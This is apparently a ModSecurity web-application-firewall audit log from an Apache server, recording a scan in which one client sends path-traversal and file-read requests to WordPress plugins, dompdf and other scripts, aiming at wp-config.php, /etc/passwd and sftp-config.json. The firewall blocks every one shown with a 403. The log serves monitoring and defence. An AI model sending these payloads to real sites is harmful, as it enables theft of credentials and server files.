"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811647423 702 (- - -) Stopwatch2: 1747172811647423 702; combined=278, p1=246, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751c4c0f-Z-- --cc3e1b0b-A-- [14/May/2025:04:46:57 +0700] aCO90TMGvM3GPb0-SyRPRwAAAFg 103.236.140.4 49012 103.236.140.4 8181 --cc3e1b0b-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274762 --cc3e1b0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc3e1b0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817448102 648 (- - -) Stopwatch2: 1747172817448102 648; combined=298, p1=267, p2=0, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc3e1b0b-Z-- --f3c1df38-A-- [14/May/2025:04:46:57 +0700] aCO90TMGvM3GPb0-SyRPSAAAAEI 103.236.140.4 49072 103.236.140.4 8181 --f3c1df38-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875147 --f3c1df38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f3c1df38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817645508 712 (- - -) Stopwatch2: 1747172817645508 712; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3c1df38-Z-- --e2bbdf23-A-- [14/May/2025:04:46:57 +0700] aCO90cOlTOX2TmGW6__uqwAAANg 103.236.140.4 49076 103.236.140.4 8181 --e2bbdf23-B-- GET /force-download.php?file=wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274765 --e2bbdf23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2bbdf23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817843495 862 (- - -) Stopwatch2: 1747172817843495 862; combined=350, p1=319, p2=0, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2bbdf23-Z-- --ca440416-A-- [14/May/2025:04:46:58 +0700] aCO90sOlTOX2TmGW6__urAAAAMA 103.236.140.4 49080 103.236.140.4 8181 --ca440416-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875150 --ca440416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca440416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172818042021 716 (- - -) Stopwatch2: 1747172818042021 716; combined=280, p1=249, p2=0, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca440416-Z-- --f0b43b4a-A-- [14/May/2025:04:46:58 +0700] aCO90sOlTOX2TmGW6__urQAAAMI 103.236.140.4 49084 103.236.140.4 8181 --f0b43b4a-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274768 --f0b43b4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0b43b4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172818240674 688 (- - -) Stopwatch2: 1747172818240674 688; combined=260, p1=227, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b43b4a-Z-- --83c6832a-A-- [14/May/2025:04:47:00 +0700] aCO91MOlTOX2TmGW6__utwAAAM0 103.236.140.4 49088 103.236.140.4 8181 --83c6832a-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274783 --83c6832a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83c6832a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172820241476 608 (- - -) Stopwatch2: 1747172820241476 608; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83c6832a-Z-- --c50a4969-A-- [14/May/2025:04:47:00 +0700] aCO91MOlTOX2TmGW6__uuAAAAM8 103.236.140.4 49110 103.236.140.4 8181 --c50a4969-B-- GET /resources/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875168 --c50a4969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c50a4969-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172820439172 717 (- - -) Stopwatch2: 1747172820439172 717; combined=302, p1=269, p2=0, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c50a4969-Z-- --a41e1333-A-- [14/May/2025:04:47:00 +0700] aCO91MabX6K9rhby1vhKKwAAAI8 103.236.140.4 49114 103.236.140.4 8181 --a41e1333-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875171 --a41e1333-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a41e1333-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172820837640 1975 (- - -) Stopwatch2: 1747172820837640 1975; combined=735, p1=364, p2=344, p3=0, p4=0, p5=27, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41e1333-Z-- --738bdb6a-A-- [14/May/2025:04:47:03 +0700] aCO918abX6K9rhby1vhKNgAAAIM 103.236.140.4 49114 103.236.140.4 8181 --738bdb6a-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274804 --738bdb6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --738bdb6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172823047222 1956 (- - -) Stopwatch2: 1747172823047222 1956; combined=723, p1=370, p2=327, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738bdb6a-Z-- --127e7c6f-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKOwAAAIY 103.236.140.4 49114 103.236.140.4 8181 --127e7c6f-B-- GET /ftps.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875195 --127e7c6f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --127e7c6f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172824050893 1922 (- - -) Stopwatch2: 1747172824050893 1922; combined=759, p1=341, p2=391, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --127e7c6f-Z-- --b894705e-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKPAAAAIg 103.236.140.4 49114 103.236.140.4 8181 --b894705e-B-- GET /ftp-config.conf HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274813 --b894705e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b894705e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172824249679 1809 (- - -) Stopwatch2: 1747172824249679 1809; combined=655, p1=306, p2=322, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b894705e-Z-- --1e73c978-A-- [14/May/2025:04:47:04 +0700] aCO92MabX6K9rhby1vhKPgAAAIk 103.236.140.4 49114 103.236.140.4 8181 --1e73c978-B-- GET /prevlaravel/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274816 --1e73c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e73c978-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172824648218 635 (- - -) Stopwatch2: 1747172824648218 635; combined=299, p1=266, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73c978-Z-- --4bb8e83b-A-- [14/May/2025:04:47:04 +0700] aCO92MOlTOX2TmGW6__uuQAAANA 103.236.140.4 49158 103.236.140.4 8181 --4bb8e83b-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875201 --4bb8e83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bb8e83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172824845926 852 (- - -) Stopwatch2: 1747172824845926 852; combined=388, p1=351, p2=0, p3=0, p4=0, p5=36, sr=160, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bb8e83b-Z-- --5656360f-A-- [14/May/2025:04:47:15 +0700] aCO948OlTOX2TmGW6__u7gAAANU 103.236.140.4 49162 103.236.140.4 8181 --5656360f-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875281 --5656360f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5656360f-E-- --5656360f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172835727159 1671 (- - -) Stopwatch2: 1747172835727159 1671; combined=533, p1=374, p2=133, p3=0, p4=0, p5=26, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5656360f-Z-- --57ba3c48-A-- [14/May/2025:04:47:15 +0700] aCO948OlTOX2TmGW6__u7wAAANc 103.236.140.4 49162 103.236.140.4 8181 --57ba3c48-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274900 --57ba3c48-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --57ba3c48-E-- --57ba3c48-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172835926671 1641 (- - -) Stopwatch2: 1747172835926671 1641; combined=478, p1=351, p2=100, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
